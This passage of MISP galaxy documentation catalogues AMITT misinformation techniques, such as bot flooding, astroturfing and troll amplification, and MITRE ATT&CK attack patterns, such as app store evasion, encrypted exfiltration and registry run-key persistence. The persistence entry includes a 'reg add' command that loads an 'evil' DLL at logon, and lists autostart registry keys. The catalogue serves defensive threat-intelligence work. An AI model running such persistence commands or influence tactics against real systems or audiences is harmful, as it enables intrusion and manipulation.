Flooding and/or mobbing social media channels feeds and/or hashtag with excessive volume of content to control/shape online conversations and/or drown out opposing points of view. Bots and/or patriotic trolls are effective tools to acheive this effect.

Example (2018): bots flood social media promoting messages which support Saudi Arabia with intent to cast doubt on allegations that the kingdom was involved in Khashoggi’s death.

The tag is: misp-galaxy:amitt-misinformation-pattern="Flooding"

Table 3050. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0049.md

Cheerleading domestic social media ops

Deploy state-coordinated social media commenters and astroturfers. Both internal/domestic and external social media influence operations, popularized by China (50cent Army manage message inside the "Great Firewall") but also technique used by Chinese English-language social media influence operations are seeded by state-run media, which overwhelmingly present a positive, benign, and cooperative image of China.

The tag is: misp-galaxy:amitt-misinformation-pattern="Cheerleading domestic social media ops"

Table 3051. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0050.md

Fabricate social media comment

Use government-paid social media commenters, astroturfers, chat bots (programmed to reply to specific key words/hashtags) influence online conversations, product reviews, web-site comment forums. (2017 example) the FCC was inundated with nearly 22 million public comments on net neutrality (many from fake accounts)

The tag is: misp-galaxy:amitt-misinformation-pattern="Fabricate social media comment"

Table 3052. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0051.md

Tertiary sites amplify news

Create content/news/opinion web-sites to cross-post stories. Tertiary sites circulate and amplify narratives. Often these sites have no masthead, bylines or attribution.

Examples of tertiary sites inculde Russia Insider, The Duran, geopolitica.ru, Mint Press News, Oriental Review, globalresearch.ca.

Example (2019, Domestic news): Snopes reveals Star News Digital Media, Inc. may look like a media company that produces local news, but operates via undisclosed connections to political activism.

Example (2018) FireEye reports on Iranian campaign that created between April 2018 and March 2019 sites used to spread inauthentic content from websites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front during the US mid-terms.

The tag is: misp-galaxy:amitt-misinformation-pattern="Tertiary sites amplify news"

Table 3053. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0052.md

Twitter trolls amplify and manipulate

Use trolls to amplify narratives and/or manipulate narratives. Fake profiles/sockpuppets operating to support individuals/narratives from the entire political spectrum (left/right binary). Operating with increased emphasis on promoting local content and promoting real Twitter users generating their own, often divisive political content, as it’s easier to amplify existing content than create new/original content. Trolls operate where ever there’s a socially divisive issue (issues that can/are be politicized) e.g. BlackLivesMatter or MeToo

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter trolls amplify and manipulate"

Table 3054. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0053.md

Twitter bots amplify

Use bots to amplify narratives above algorithm thresholds. Bots are automated/programmed profiles designed to amplify content (ie: automatically retweet or like) and give appearance it’s more "popular" than it is. They can operate as a network, to function in a coordinated/orchestrated manner. In some cases (more so now) they are an inexpensive/disposable assets used for minimal deployment as bot detection tools improve and platforms are more responsive.(example 2019) #TrudeauMustGo

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter bots amplify"

Table 3055. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0054.md

Use hashtag

Use the dedicated hashtag for the incident (e.g. #PhosphorusDisaster)

The tag is: misp-galaxy:amitt-misinformation-pattern="Use hashtag"

Table 3056. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0055.md

Dedicated channels disseminate information pollution

Output information pollution (e.g. articles on an unreported false story/event) through channels controlled by or related to the incident creator. Examples include RT/Sputnik or antivax websites seeding stories.

The tag is: misp-galaxy:amitt-misinformation-pattern="Dedicated channels disseminate information pollution"

Table 3057. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0056.md

Organise remote rallies and events

Coordinate and promote real-world events across media platforms, e.g. rallies, protests, gatherings in support of incident narratives. Example: Facebook groups/pages coordinate/more divisive/polarizing groups and actvities into the public space. (Example) Mueller’s report, highlights, the IRA organized political rallies in the U.S. using social media starting in 2015 and continued to coordinate rallies after the 2016 election

The tag is: misp-galaxy:amitt-misinformation-pattern="Organise remote rallies and events"

Table 3058. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0057.md

Legacy web content

Make incident content visible for a long time, e.g. by exploiting platform terms of service, or placing it where it’s hard to remove or unlikely to be removed.

The tag is: misp-galaxy:amitt-misinformation-pattern="Legacy web content"

Table 3059. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0058.md

Play the long game

The tag is: misp-galaxy:amitt-misinformation-pattern="Play the long game"

Table 3060. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0059.md

Continue to amplify

The tag is: misp-galaxy:amitt-misinformation-pattern="Continue to amplify"

Table 3061. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0060.md

Sell merchandising

Sell hats, t-shirts, flags and other branded content that’s designed to be seen in the real world

The tag is: misp-galaxy:amitt-misinformation-pattern="Sell merchandising"

Table 3062. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0061.md

Attack Pattern

ATT&CK tactic.

Attack Pattern is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

Test ability to evade automated mobile application security analysis performed by app stores - T1393

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1393).

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)

The tag is: misp-galaxy:mitre-attack-pattern="Test ability to evade automated mobile application security analysis performed by app stores - T1393"

Table 3063. Table References
Links
https://attack.mitre.org/techniques/T1393

Choose pre-compromised mobile app developer account credentials or signing keys - T1391

The adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer’s identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)

The tag is: misp-galaxy:mitre-attack-pattern="Choose pre-compromised mobile app developer account credentials or signing keys - T1391"

Table 3064. Table References
Links
https://attack.mitre.org/techniques/T1391

Enumerate externally facing software applications technologies, languages, and dependencies - T1261

Software applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)

The tag is: misp-galaxy:mitre-attack-pattern="Enumerate externally facing software applications technologies, languages, and dependencies - T1261"

Table 3065. Table References
Links
https://attack.mitre.org/techniques/T1261

Obtain Apple iOS enterprise distribution key pair and certificate - T1392

The adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Apple iOS enterprise distribution key pair and certificate - T1392"

Table 3066. Table References
Links
https://attack.mitre.org/techniques/T1392

Analyze social and business relationships, interests, and affiliations - T1295

Social media provides insight into the target’s affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze social and business relationships, interests, and affiliations - T1295"

Table 3067. Table References
Links
https://attack.mitre.org/techniques/T1295

Linux and Mac File and Directory Permissions Modification - T1222.002

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> (short for change mode).

Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002"

Table 3068. Table References
Links
https://attack.mitre.org/techniques/T1222/002
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110
https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

Install and configure hardware, network, and systems - T1336

An adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)

The tag is: misp-galaxy:mitre-attack-pattern="Install and configure hardware, network, and systems - T1336"

Table 3069. Table References
Links
https://attack.mitre.org/techniques/T1336

Compromise 3rd party or closed-source vulnerability/exploit information - T1354

There is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise 3rd party or closed-source vulnerability/exploit information - T1354"

Table 3070. Table References
Links
https://attack.mitre.org/techniques/T1354
https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage

Discover new exploits and monitor exploit-provider forums - T1350

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)

The tag is: misp-galaxy:mitre-attack-pattern="Discover new exploits and monitor exploit-provider forums - T1350"

Table 3071. Table References
Links
https://attack.mitre.org/techniques/T1350
https://www.threatminer.org/_reports/2015/Equation_group_questions_and_answers.pdf

Acquire and/or use 3rd party software services - T1330

A wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330"

View relationships graph

Acquire and/or use 3rd party software services - T1330 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1308" with estimative-language:likelihood-probability="almost-certain"

Table 3072. Table References
Links
https://attack.mitre.org/techniques/T1330

Acquire and/or use 3rd party infrastructure services - T1307

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1307"

View relationships graph

Acquire and/or use 3rd party infrastructure services - T1307 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329" with estimative-language:likelihood-probability="almost-certain"

Table 3073. Table References
Links
https://attack.mitre.org/techniques/T1307

Acquire and/or use 3rd party software services - T1308

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1308"

View relationships graph

Acquire and/or use 3rd party software services - T1308 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330" with estimative-language:likelihood-probability="almost-certain"

Table 3074. Table References
Links
https://attack.mitre.org/techniques/T1308

Test signature detection for file upload/email filters - T1361

An adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)

The tag is: misp-galaxy:mitre-attack-pattern="Test signature detection for file upload/email filters - T1361"

Table 3075. Table References
Links
https://attack.mitre.org/techniques/T1361

Acquire and/or use 3rd party infrastructure services - T1329

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329"

View relationships graph

Acquire and/or use 3rd party infrastructure services - T1329 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1307" with estimative-language:likelihood-probability="almost-certain"

Table 3076. Table References
Links
https://attack.mitre.org/techniques/T1329
https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf

Acquire or compromise 3rd party signing certificates - T1310

Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1310"

View relationships graph

Acquire or compromise 3rd party signing certificates - T1310 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1332" with estimative-language:likelihood-probability="almost-certain"

Table 3077. Table References
Links
https://attack.mitre.org/techniques/T1310

Compromise 3rd party infrastructure to support delivery - T1312

Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312"

View relationships graph

Compromise 3rd party infrastructure to support delivery - T1312 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334" with estimative-language:likelihood-probability="almost-certain"

Table 3078. Table References
Links
https://attack.mitre.org/techniques/T1312

Acquire or compromise 3rd party signing certificates - T1332

Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is. (Citation: DiginotarCompromise)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1332"

View relationships graph

Acquire or compromise 3rd party signing certificates - T1332 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1310" with estimative-language:likelihood-probability="almost-certain"

Table 3079. Table References
Links
https://attack.mitre.org/techniques/T1332
https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/

Compromise 3rd party infrastructure to support delivery - T1334

The tag is: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334"

View relationships graph

Compromise 3rd party infrastructure to support delivery - T1334 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312" with estimative-language:likelihood-probability="almost-certain"

Table 3080. Table References
Links
https://attack.mitre.org/techniques/T1334

Human performs requested action of physical nature - T1385

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Through social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)

The tag is: misp-galaxy:mitre-attack-pattern="Human performs requested action of physical nature - T1385"

Table 3081. Table References
Links
https://attack.mitre.org/techniques/T1385
https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

Abuse of iOS Enterprise App Signing Key - T1445

An adversary could abuse an iOS enterprise app signing key (intended for enterprise in-house distribution of apps) to sign malicious iOS apps so that they can be installed on iOS devices without the app needing to be published on Apple’s App Store. For example, Xiao describes use of this technique in (Citation: Xiao-iOS).

Detection: iOS 9 and above typically requires explicit user consent before allowing installation of applications signed with enterprise distribution keys rather than installed from Apple’s App Store.

Platforms: iOS

The tag is: misp-galaxy:mitre-attack-pattern="Abuse of iOS Enterprise App Signing Key - T1445"

View relationships graph

Abuse of iOS Enterprise App Signing Key - T1445 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 3082. Table References
Links
https://attack.mitre.org/techniques/T1445

Deliver Malicious App via Authorized App Store - T1475

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.

App stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:

[Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)
[Obfuscated Files or Information](https://attack.mitre.org/techniques/T1406)

Adversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)

Adversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)

Adversaries may also use control of a target’s Google account to use the Google Play Store’s remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)

The tag is: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475"

Table 3083. Table References
Links
https://attack.mitre.org/techniques/T1475
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html
http://dl.acm.org/citation.cfm?id=2592796
https://jon.oberheide.org/files/summercon12-bouncer.pdf
https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH_US_12_Percoco_Adventures_in_Bouncerland_WP.pdf
https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei
https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/
http://www.vvdveen.com/publications/BAndroid.pdf

Device Unlock Code Guessing or Brute Force - T1459

An adversary could make educated guesses of the device lock screen’s PIN/password (e.g., commonly used values, birthdays, anniversaries) or attempt a dictionary or brute force attack against it. Brute force attacks could potentially be automated (Citation: PopSci-IPBox).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Device Unlock Code Guessing or Brute Force - T1459"

View relationships graph

Device Unlock Code Guessing or Brute Force - T1459 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"

Table 3084. Table References
Links
https://attack.mitre.org/techniques/T1459

Assign KITs, KIQs, and/or intelligence requirements - T1238

Once generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Assign KITs, KIQs, and/or intelligence requirements - T1238"

Table 3085. Table References
Links
https://attack.mitre.org/techniques/T1238

Assess current holdings, needs, and wants - T1236

Analysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)

The tag is: misp-galaxy:mitre-attack-pattern="Assess current holdings, needs, and wants - T1236"

Table 3086. Table References
Links
https://attack.mitre.org/techniques/T1236

Submit KITs, KIQs, and intelligence requirements - T1237

Once they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)

The tag is: misp-galaxy:mitre-attack-pattern="Submit KITs, KIQs, and intelligence requirements - T1237"

Table 3087. Table References
Links
https://attack.mitre.org/techniques/T1237

Common, high volume protocols and software - T1321

Certain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary’s traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)

The tag is: misp-galaxy:mitre-attack-pattern="Common, high volume protocols and software - T1321"

Table 3088. Table References
Links
https://attack.mitre.org/techniques/T1321

Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP).

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001"

Table 3089. Table References
Links
https://attack.mitre.org/techniques/T1048/001
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002"

Table 3090. Table References
Links
https://attack.mitre.org/techniques/T1048/002
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Non-traditional or less attributable payment options - T1316

Using alternative payment options allows an adversary to hide their activities. Options include crypto currencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)

The tag is: misp-galaxy:mitre-attack-pattern="Non-traditional or less attributable payment options - T1316"

Table 3091. Table References
Links
https://attack.mitre.org/techniques/T1316

Choose pre-compromised persona and affiliated accounts - T1343

For attacks incorporating social engineering the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)

The tag is: misp-galaxy:mitre-attack-pattern="Choose pre-compromised persona and affiliated accounts - T1343"

Table 3092. Table References
Links
https://attack.mitre.org/techniques/T1343
https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

Malicious or Vulnerable Built-in Device Functionality - T1473

The mobile device could contain built-in functionality with malicious behavior or exploitable vulnerabilities. An adversary could deliberately insert and take advantage of the malicious behavior or could exploit inadvertent vulnerabilities. In many cases, it is difficult to be certain whether exploitable functionality is due to malicious intent or simply an inadvertent mistake.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious or Vulnerable Built-in Device Functionality - T1473"

View relationships graph

Malicious or Vulnerable Built-in Device Functionality - T1473 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 3093. Table References
Links
https://attack.mitre.org/techniques/T1473

Identify vulnerabilities in third-party software libraries - T1389

Many applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify vulnerabilities in third-party software libraries - T1389"

Table 3094. Table References
Links
https://attack.mitre.org/techniques/T1389

Registry Run Keys / Startup Folder - T1547.001

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account’s associated permissions level.

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.

The following run keys are created by default on Windows systems:

<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

The following Registry keys can be used to set startup folder items for persistence:

<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:

<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</code> and <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</code> subkeys can automatically launch programs.

Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run when any user logs on.

By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"

Table 3095. Table References
Links
https://attack.mitre.org/techniques/T1547/001
https://capec.mitre.org/data/definitions/270.html
http://msdn.microsoft.com/en-us/library/aa376977
https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/
https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key
https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
https://technet.microsoft.com/en-us/sysinternals/bb963902

Clear Linux or Mac System Logs - T1070.002

